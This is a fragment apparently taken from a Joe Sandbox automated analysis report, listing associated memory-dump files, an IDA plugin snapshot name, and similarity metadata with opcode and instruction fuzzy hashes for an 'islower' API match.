                                                                • Associated: 00000000.00000002.2632368315.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000121C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632903275.000000000121D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2633050684.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2633078938.00000000013D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: islower
                                                                • String ID: $
                                                                • API String ID: 3326879001-3993045852
                                                                • Opcode ID: 18ba9fa8bab586d7f32a82e34484789797b07a257a6a49381d64b3f4f747a4c4
                                                                • Instruction ID: 12c39f72716d021bbdc128f5880f4c03dc6b3a2d8e15cb4b09fef3c1474eea77
                                                                • Opcode Fuzzy Hash: 18ba9fa8bab586d7f32a82e34484789797b07a257a6a49381d64b3f4f747a4c4
                                                                • Instruction Fuzzy Hash: 6E61A3706083458BC714DF69C88022EFBE2AFC5754F248A2DE4A58B3E1EB74DE45DB46